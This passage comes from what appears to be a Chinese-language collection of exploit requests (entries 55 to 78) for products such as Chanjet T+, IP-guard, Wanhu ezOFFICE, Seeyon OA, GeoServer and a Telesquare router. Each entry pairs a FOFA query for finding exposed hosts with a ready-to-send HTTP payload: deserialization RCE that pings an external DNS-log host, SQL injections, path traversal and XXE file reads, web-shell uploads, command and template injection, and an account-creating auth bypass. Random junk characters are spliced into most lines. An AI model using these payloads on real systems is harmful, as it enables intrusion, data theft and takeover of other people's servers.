/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie, d3 C' g* h# |, @9 F$ m3 M2 M0 T
第二步,利用获取到的Cookie请求
) _: L' O" M+ Y7 u) g/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
; f6 _  h8 ?. C  N
. K3 ]3 L0 K5 F  x56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
+ e: X( R. m2 sFOFA: app="畅捷通-TPlus"1 Q. d  r* F: w; I' J
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.15 u2 H) N- z' N
Host: x.x.x.x3 E  a6 Y+ s1 U5 X) }6 k  S5 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36/ ^& r5 B. r6 r2 i
Content-Type: application/json
# ^4 D7 Z. B* q! q, q% H/ i7 q8 E( M2 B$ S
{, i) C3 ~  G/ E. I. f5 T& j* w
  "storeID":{; z9 S+ a, f0 F; z5 n1 j9 F
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",; F& N; R! K& ?* s; f4 [3 I/ _! O3 B
   "MethodName":"Start",
- ]$ B' y( j$ n; p    "ObjectInstance":{* f# ]) `# h3 V" d
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",3 A0 a. t- f& O7 B
        "StartInfo": {
/ I* }9 w" R3 t% _2 l! j! i           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",8 \4 h7 R; C8 V; H- b& d9 Z4 g% x7 b
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
$ J/ p. V. a2 c7 p: v! E" T; k; j       }2 ^& [: j' D/ X5 Y) b- ]
    }/ f$ X: m7 V& U6 t7 C3 _$ Z+ M% i
  }% h3 o1 S, X/ v: j0 K. _
}
( V  v# N, _8 @7 C; M3 A0 j  ?" M& j$ N/ k8 O5 U: T, ]

$ b  S6 ]! L" D; X& d! i% q) S57. 畅捷通T+ keyEdit.aspx SQL注入
% A& ]$ R* K; w& x1 G# M1 F$ l* DFOFA:app="畅捷通-TPlus"
0 J; ?2 A3 [" Q5 M! KGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
6 _5 [5 P# k" c8 u( GHost: host7 l9 `: s, {9 H- U# v* L
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
! l7 D5 G  J3 F9 BAccept-Charset: utf-8
" e( ~. i7 V4 v5 y/ h1 gAccept-Encoding: gzip, deflate
7 }6 C, [# ?9 I8 @Connection: close0 y1 d% Z- K/ w$ H8 g! s

' b1 E5 f1 e. D1 O4 T$ C$ S9 B2 o3 g; I% X6 G* |
58. 畅捷通T+ KeyInfoList.aspx sql注入- z/ |( N# M+ ~1 E
FOFA:app="畅捷通-TPlus"
% w" b1 ^& m7 j2 uGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
/ I# \' x& w. D) ?& f' |Host: your-ip! d2 S( r$ R1 _& w# w0 Q$ r% G0 h
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36) i' p8 v; B1 Q' U! {& P
Accept-Charset: utf-8; N. K( r& \) V+ \2 {2 d: ^6 k
Accept-Encoding: gzip, deflate! P' o6 g7 \9 B- |( h
Connection: close8 n8 S% |8 y1 H9 L: f, c! w. V
+ j6 q2 N% ~1 y" F$ v4 V3 ?

. X5 I6 m! J, J0 F1 o59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
5 ]& @% V" h6 xFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
2 F5 F$ q4 \# z$ t' e6 ~POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" n! P* p6 P0 t, h
Host: 192.168.86.128:9090  O( P- O' P" _4 U! N
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36% V0 E% J! E; s( \: c& B0 W
Connection: close6 `% x6 Z" _+ ~, A8 N8 n
Content-Length: 1669
) I. A( e( T: P6 s  b' BAccept: */*; E0 N# `$ n4 u. w% f$ c
Accept-Language: en
- G/ ]6 }; }+ r8 ?% |5 @Content-Type: application/x-www-form-urlencoded
4 d, g5 R) x+ y2 bAccept-Encoding: gzip
) a0 o* [: w4 o
6 Y2 s. f3 p; @9 yPAYLOAD7 i' W) q% G# k' N0 C' ~

( T0 P9 s' f1 }' ^0 p# @; S8 u
5 U# {- S5 r2 b# T' K& Y3 I60. 百卓Smart管理平台 importexport.php SQL注入* R1 \6 T, K2 H7 e
FOFA:title="Smart管理平台"
' f0 S% O7 W/ C4 Q( [# ^/ yGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
! ^9 h* Z9 ]# Y& }, n+ gHost:  y5 Y" f8 X. I9 t" e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
- P5 K5 v% G9 L; z0 A5 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! ~! ^, |; h* T6 kAccept-Encoding: gzip, deflate; R4 c3 ^3 c4 U5 |" L0 v/ Q9 r
Accept-Language: zh-CN,zh;q=0.9
( L2 }3 f$ Z9 ^7 L: dConnection: close/ l9 v9 L2 A3 `: H5 X. m
& c5 h, g6 Z7 [* @) ~) \8 U
: Y0 t5 S; N+ p2 c  Z7 X
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传. L8 X/ L- @9 n3 |1 G: H( y) m2 a
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
0 Z0 i3 @9 E( T7 K' u  s6 V/ x! RPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.11 v9 k2 K# h4 Y( H1 o; ~
Host: x.x.x.x
; S" k" G- E- s5 Q/ N  qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, ^& x! u0 }* Z- D: uConnection: close1 l( F! l2 O; }# x7 }
Content-Length: 276 }6 B) x. r) Z& U
Accept: */*. ?: P( V. F/ |& \# U
Accept-Encoding: gzip, deflate
2 V0 ?( l  z5 B% v+ T: c( y  oAccept-Language: en# D0 K" q* H$ l  K  f: R! l
Content-Type: application/x-www-form-urlencoded! i- t+ `4 \( ?4 |2 S3 c5 i
; d9 O0 O% M+ {: _- j
8uxssX66eqrqtKObcVa0kid98xa
5 g$ E- Z: Y8 ?: p9 j1 ]6 k! |6 w- n. i. ]* Z2 d+ V

6 `/ ^2 E/ |& N9 t' w  U( u4 Y62. IP-guard WebServer 远程命令执行# K* b3 p* L* }  k8 C* ~
FOFA:"IP-guard" && icon_hash="2030860561"
/ \1 E1 v. f+ `6 iGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1! c$ o$ I) z8 w' `9 B
Host: x.x.x.x
' d5 L, E8 X( u0 \User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
4 w0 W4 l/ V/ M/ U* J' _* wConnection: close
8 @0 e; Z! f* wAccept: */*
) r. U4 U5 p" K1 OAccept-Language: en
" K% j+ f! N  H" OAccept-Encoding: gzip
4 a5 b# v2 P3 A  v, H9 ?, |7 z% S. c; I8 J
, O% j0 y/ p2 c0 l
访问' n; v/ I' s$ s" ]1 w/ c0 O

1 e$ u4 c- U1 L. F% y  D+ UGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
6 {: |; Q& ?* M2 @Host: x.x.x.x* w; z# b! J( b. V

' m1 r( K" _- _
5 g1 o& k* f' T63. IP-guard WebServer任意文件读取0 r$ D3 Z. ~/ q. a
IP-guard < 4.82.0609.03 I" |5 Y7 \/ t' |$ {3 s9 u
FOFA:icon_hash="2030860561"+ z! I, `" K# D/ J& E
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
  F" o% J: p3 `+ K8 gHost: your-ip
, `# ~) y6 x5 R* B9 r% }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36) `: Y5 C* v5 \- m) ?: b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' i$ G- l- [* Y. m9 uAccept-Encoding: gzip, deflate
) {. h3 m* I0 s  `Accept-Language: zh-CN,zh;q=0.9
; y& m1 j9 O9 g# U" S4 WConnection: close; X2 H$ P# ~) p! i% q( E
Content-Type: application/x-www-form-urlencoded; h$ K2 X2 k4 B7 U( R5 G6 V% @

& Q9 K) g3 W2 u4 b: Q( r6 lpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A* N' @9 V& V) F) ~) U
" f5 E% x9 D* |3 @2 N% N- @
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
9 z7 S7 e; D+ |& r( M( t7 ]FOFA:body="/Scripts/EnjoyMsg.js"
" g- w/ m5 V- u) J& _2 P. v8 |; rPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
( U2 ]0 b) ~2 M" j4 X: QHost: 192.168.86.128:9001
! }9 h: c3 |* o1 `+ j* u( N  nUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
8 v0 i1 P' }( x( V( K3 j6 |Connection: close
5 ]' m0 Z: Q# t& X% y0 ?9 nContent-Length: 3693 W; N+ e' H) A2 s
Accept: */*) m! b0 m% L# `( h8 A
Accept-Language: en
# V4 t& g/ k# @8 O" d  [4 |6 {! N# ZContent-Type: text/xml; charset=utf-86 J+ r! w$ A% q# P( Y0 \: o
Accept-Encoding: gzip
, y, \4 J5 s3 L* M. R
2 k- Y+ R  `1 R<?xml version="1.0" encoding="utf-8"?>  A# n' c- g' T' _! j% l+ ^
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
- G' v7 [  R6 k<soap:Body>4 G: E4 u* W% x* s% H8 K
    <GetOSpById xmlns="http://tempuri.org/">- v7 u+ I# o! c
      <sId>1';waitfor delay '0:0:5'--+</sId>
. g) G$ ]6 p, F5 S: R    </GetOSpById>
/ |- G1 B# k, l' f2 ^  </soap:Body>9 K9 W# S/ A4 v! ~! J3 U
</soap:Envelope>; k: w( q: M9 h2 Y! l( l' a& n

) }/ A" U3 ^& a7 z1 o. ~5 X! F: L) [  a& M! y+ Z
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过# G& {, r; v4 F4 X5 m
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
/ O1 D3 ]9 C: G, o! |2 c) O响应200即成功创建账号test123456/123456
- V" I% C2 B1 J  W5 T4 C0 FPOST /SystemMng.ashx HTTP/1.1
5 b$ |8 D( W/ k7 LHost:
6 J4 T6 B- n( B* Q6 ?1 T6 UUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
" c& t3 E7 c; ?1 }0 H2 E: `Accept-Encoding: gzip, deflate$ _2 w' n" w% K  x' ?5 J% T+ z
Accept: */*8 }# k( B7 o' o; @8 f+ m, n) G, X
Connection: close
$ E$ c2 D  r$ ]0 @- n. kAccept-Language: en
4 V1 M/ }) ?& c0 nContent-Length: 174
9 R$ N( C3 X; O, y( Q' [) P4 X# L. Z/ u. \$ [
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
5 g2 F& m4 {+ u2 Z" g1 E  N# Z0 y( x' U

  h! {' k8 I0 J: S7 e66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
( Z4 `& c% G, G4 VFOFA:app="万户ezOFFICE协同管理平台"
' I7 C! F8 y. P+ I+ |+ H
3 U" n. ^4 x2 `# w/ u5 fGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
* |' \9 ^5 }+ z! e" t  q; t& rHost: x.x.x.x
5 q1 H5 B8 _+ a6 G$ c: HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.361 G6 k# `6 u' S% A% O( P/ E% [
Connection: close
; Z& k4 K* G9 wAccept: */*
4 J- R% b( s0 q: K- y; x  WAccept-Language: en$ Q/ O8 i) q5 T3 T- e8 ]
Accept-Encoding: gzip
) k0 R/ F5 ~- H+ l' J' A0 T. x. x( r2 y; |5 F0 z6 w9 B  p% P/ X

7 N5 Z: ^2 j9 s1 r" i+ Y$ k  v+ q$ G第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
# s) T" I+ K! \' I& O9 S5 O$ [. @- k$ L3 g( y
67. 万户ezOFFICE wpsservlet任意文件上传
# H' Y# ?+ V; n2 }2 X. l0 A+ _FOFA:app="万户网络-ezOFFICE"
  n& G: j1 U# E& MnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
& o) I8 N/ n; a& F3 K3 iPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
2 f6 c/ d# ?1 HHost: x.x.x.x0 K4 V1 L5 ~$ X1 }. O5 o
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0/ B) f2 s8 z+ M/ M. A/ ]
Content-Length: 173
0 y2 l" S5 s- ~7 @3 R' s- i1 GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
) a3 M# L2 I. d1 [6 z# CAccept-Encoding: gzip, deflate
& d( v' O; Q* E6 G; l+ b2 yAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
. a) Z( D: M, d4 P4 u8 L, SConnection: close* [5 h0 l8 @# D. R! d9 V/ ?
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
9 |: C8 H9 M( f( Q* R0 k0 ~DNT: 1
/ I/ \4 N$ Z0 S% S8 I! C+ v: V- VUpgrade-Insecure-Requests: 1+ x- h. z8 R9 _1 ?* v$ Y1 N

6 k7 ?9 P$ r2 M& j--ufuadpxathqvxfqnuyuqaozvseiueerp3 [. g7 o! N. K, [% y
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
+ _+ o8 y* _8 D- S
6 N3 v% b( S. o) E4 \+ h* \<% out.print("sasdfghjkj");%>
+ K9 W& C$ H6 Y1 Z5 L! n/ _--ufuadpxathqvxfqnuyuqaozvseiueerp--
9 l+ J; w5 b7 y# H. ~
, ?6 @4 u2 s) \& p: C7 m
0 {8 B4 r( `) V, I文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp" B) \7 I% w# f5 ]  U1 o
4 e. \6 W3 h5 s  L% u( ^! _* @/ z  N
68. 万户ezOFFICE wf_printnum.jsp SQL注入
& J# C# ?7 ~. K! S2 l* l4 fFOFA:app="万户ezOFFICE协同管理平台"
7 S: X5 ~, v7 J  M4 N2 tGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
5 ^: C3 A% x/ Z8 fHost: {{host}}% D, k7 H- l7 I# s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
: z9 U$ @' S) t$ {  Z9 v0 o/ ^2 zAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.88 [) u+ X8 I$ D$ W2 r7 J% x
Accept-Encoding: gzip, deflate6 G  z5 N3 Z8 A
Accept-Language: zh-CN,zh;q=0.9
, X! w) c+ g" c; @! t6 r9 }Connection: close
, n" t2 j6 X, e: l# {; b- s) }
  T) s; `; B/ q  I  J3 R- T. ^( C& c: g% I6 S. a" ~- a
69. 万户 ezOFFICE contract_gd.jsp SQL注入. J* z' d$ y7 _0 ~
FOFA:app="万户ezOFFICE协同管理平台"9 t; ^7 C4 V4 p6 }  _0 O6 O
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
" X  p4 {( u) W/ OHost: your-ip
  T  r: Y) o) O  |4 [0 b" N5 _User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
4 [' z7 Q2 h3 y4 A5 rAccept-Encoding: gzip, deflate! _% f" G% `3 v# s3 i
Accept: */*( ?% O2 W' T: Z: A$ a
Connection: keep-alive
8 I6 J& b$ j# V2 p4 c6 O0 e+ _- G3 N0 |4 O

4 v/ I- ?& k# D! O# r5 N1 F70. 万户ezEIP success 命令执行
* n9 z3 p/ |$ E8 t* x( WFOFA:app="万户网络-ezEIP"
6 d2 M! y$ W; y2 b! p1 mPOST /member/success.aspx HTTP/1.12 {8 G; z3 I1 D& y0 U8 P7 u
Host: {{Hostname}}6 F' W% r; q& |8 f! c) i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
, K6 |/ X+ [2 y% S- u. bSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=$ u- }; j/ D4 r' s, ^( Y) Y# `
Content-Type: application/x-www-form-urlencoded
: r& D5 L  l+ N% }4 S8 I4 YTYPE: C
7 R. {, }6 v' l& ~; AContent-Length: 16702# j# ^# E5 W4 N; l5 _

) m, L7 \$ ^6 p+ ?__VIEWSTATE=PAYLOAD& o) T7 V6 C% P
; [) Q  u3 I) f
* O6 L0 J7 g* k+ ?
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入2 Y4 K, T5 P' {1 Z( D: Q( t7 p6 @: F
FOFA:body="PM2项目管理系统BS版增强工具.zip"- I4 |1 x- A. K. k- [; R5 T- \) G" X9 R
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1# b7 Y0 e. K: [5 t7 Z
Host: x.x.x.xx.x.x.x
' O0 L" |5 I. J) o0 _: K6 B; `: gUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36( K  Z$ {* S2 ?
Connection: close" K# |5 H' `$ c- W7 q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" S$ A* v6 v4 H% tAccept-Encoding: gzip, deflate+ t' ]& {( y2 S/ p1 S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: J0 L, ~: s* e9 _4 u" x' V* V4 ]Upgrade-Insecure-Requests: 1
+ k: R$ d# h5 `% [  H4 X& m# E+ ?
- a& S! G/ n. G; ?
& V/ M" _0 r$ i& ~4 n72. 致远OA getAjaxDataServlet XXE
8 `0 `* N+ `0 a% j/ sFOFA:app="致远互联-OA"
: ^! a! V- M( u' V% |: @POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.10 Q5 A' \; [0 f; t
Host: 192.168.40.131:8099
# H: M! A2 c$ [  ^5 oUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36+ i& A+ F9 }& }
Connection: close
1 N* N6 U0 t/ y+ LContent-Length: 583
7 D: `5 [( w: d2 @) S8 HContent-Type: application/x-www-form-urlencoded
* a, G' c- U+ f' _5 kAccept-Encoding: gzip
% Y( H0 e' e2 k" j8 y3 I" E1 c  \6 X
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E- Z- Y6 F* Y3 j7 b- V

/ U3 x' r& E1 z) X8 w/ J1 }9 U
% ?) t$ _( c2 D7 L+ V0 V73. GeoServer wms远程代码执行' Y& J0 t0 b2 d& A
FOFA:icon_hash=”97540678”
& J  [6 R% b- ~: p: w8 m5 v1 ^POST /geoserver/wms HTTP/1.19 m) v4 G6 ]. b& T2 T1 p% t& L$ Z
Host:
% \6 @" l  q4 m/ z+ t' VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.364 w4 K# D" [! O, i
Content-Length: 1981! S5 P, c$ c% e5 y6 J: b" u4 M
Accept-Encoding: gzip, deflate* p: [8 U5 h4 D+ t( f6 D
Connection: close! \2 g, C5 I! E7 Q3 u* N/ r
Content-Type: application/xml
& b) P9 [& a' i" ^) F6 l5 iSL-CE-SUID: 3+ Y. ?+ t7 ^& F4 k; R
/ @% _% L3 `2 {! |7 k# T1 P+ K
PAYLOAD3 k, Z# ]8 R/ i5 }/ [6 ^

; ^+ s& K0 A& V' h0 ?; l, t6 W; s* i7 G( h+ e/ g
74. 致远M3-server 6_1sp1 反序列化RCE) {  [+ x' \/ `$ G, y  R* S" i
FOFA:title="M3-Server"
/ @  h' {. [9 o& i. \& q: b; {/ D& n0 cPAYLOAD, t0 |/ A) m2 |2 d+ O: S8 A

% C( Q4 ?- D0 l- G% K* M2 M+ g9 `75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE2 y6 [# R# n$ a2 Z4 u
FOFA:app="TELESQUARE-TLR-2005KSH"
: v# y9 p1 d' e& t$ y/ l1 P( E3 `GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
; m& z  ^& u( z4 kHost: x.x.x.x
1 J& j9 B: B) R8 l" lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! R! R; |3 A" }2 F: O) ]" P% V
Connection: close) a- z& r2 b; _) \# b
Accept: */*& [$ O- v- U4 |  y! s; |3 h4 r3 Z* x
Accept-Language: en
; @* z$ Y" l2 `9 B7 b: @8 `Accept-Encoding: gzip) h0 C/ K' V- W5 U& f

8 x- ?2 D$ g7 S- F! T
: _5 b' x5 G& Z# C4 [7 uGET /cgi-bin/test28256.txt HTTP/1.1
5 A- {' i9 z) \( e3 q( W$ CHost: x.x.x.x
) x7 q* X& X8 o& t) w
3 Q! p$ o* R# H# p6 s1 z& I3 G1 c* N0 j- ?& i/ c+ t7 ?
76. 新开普掌上校园服务管理平台service.action远程命令执行( X/ ~8 f# h5 H8 W
FOFA:title="掌上校园服务管理平台"
2 o) [9 u2 o# ~% E( T7 hPOST /service_transport/service.action HTTP/1.17 l6 M4 P1 u" r5 p$ {' L2 \
Host: x.x.x.x, u# Z' J  u& N* O5 j; O! v! v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0& N3 V' j4 s3 i9 E; L2 {
Connection: close
2 O1 Y& A3 e! k9 {* r) D( {Content-Length: 211/ n3 z  B/ ~( T: T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 j5 \1 z5 k* H" l- ZAccept-Encoding: gzip, deflate
! H: g. L8 }, u/ J: ?/ RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 U; h3 O6 o' W9 b0 o# |/ F
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4+ w* x4 {; l* D2 W  z/ j0 C
Upgrade-Insecure-Requests: 1) V: G, z' x5 x2 g4 |- t
/ ^& D. U! \; N+ o2 b  O* @1 X, e
{
' l: p' T6 q+ T; H* O5 q"command": "GetFZinfo",
0 _8 o& c( X5 U# l, ]  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"% M# C3 p. F3 T
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"5 a, l9 ]* T' b2 X
}
. U8 a! y! m' n
/ g! u+ D# f8 G  q8 _& G( {( e# V" l# `! m$ U( Z+ d& c- M
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1  h6 h6 l3 O. P" t, x
Host: x.x.x.x
. N2 ~/ U- |3 ?, }7 X, t- x3 y0 A+ m9 C' p4 [1 }1 G7 D) k3 J) F

. E6 p! V7 R! T. e: N6 M7 M: i) b
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
. f( C) \# R! [/ K3 X" V+ ?6 lFOFA:body="F22WEB登陆"& W4 [( ~2 |/ K/ j4 @
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1* D9 Z4 B9 R& ~/ t+ F3 y
Host: x.x.x.x1 z$ v* C5 R3 ?) A0 [' m) F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36* a1 X9 M7 n% J$ Q! v+ O% ]" i/ Z
Connection: close% n: C( U7 k+ Z3 h4 k& f5 \) z
Content-Length: 433
* [, J: e1 p4 ]9 l' @  B7 N% dAccept: */*6 w0 J, f5 O) x% [; B& Z6 t" f
Accept-Encoding: gzip, deflate& N7 _" X2 |  e
Accept-Language: zh-CN,zh;q=0.9( \0 u# [5 a  U; w  M6 l
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix. F1 q4 m# z# `5 V5 L

0 {8 N# {( b3 q------------398jnjVTTlDVXHlE7yYnfwBoix# i6 Q& a0 F. f# Y' e% E
Content-Disposition: form-data; name="folder"' j# a8 [/ p: ^3 @3 K* V
* X, G  n! m$ n
/upload/udplog# u0 q. L* r+ U0 P
------------398jnjVTTlDVXHlE7yYnfwBoix0 Z1 T: B1 q' R' l( L
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"% I+ g" t" M4 P/ }  {+ e) m
Content-Type: application/octet-stream
. P0 z2 _4 l7 S6 O; a* Z# a3 y# R0 {0 e7 E
hello1234567
  U  a+ U1 e& N$ l# n' r------------398jnjVTTlDVXHlE7yYnfwBoix
+ c0 b4 V3 u, h6 j4 s. i/ yContent-Disposition: form-data; name="Upload"
7 T, d( q6 R' h: m9 z' M/ P1 q! t! h2 Q* m- ~* W5 t
Submit Query! A7 Q$ _+ ~; x8 A
------------398jnjVTTlDVXHlE7yYnfwBoix--
) r" u: w4 w) j1 h, H8 Q) F9 {% G4 k/ F- E) L  o
  f  K0 M# M3 x; R5 u
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
6 s# O8 a$ Y' F- u& d3 oFOFA:icon_hash="2001627082"
